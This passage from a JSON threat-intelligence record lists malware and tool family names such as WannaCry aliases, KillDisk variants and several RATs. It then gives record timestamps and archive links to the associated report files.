				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434163,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/db4d393ec942e8a3c1c3ce18eef66051aa214a1c.pdf",
		"text": "https://archive.orkl.eu/db4d393ec942e8a3c1c3ce18eef66051aa214a1c.txt",
		"img": "https://archive.orkl.eu/db4d393ec942e8a3c1c3ce18eef66051aa214a1c.jpg"
	}
}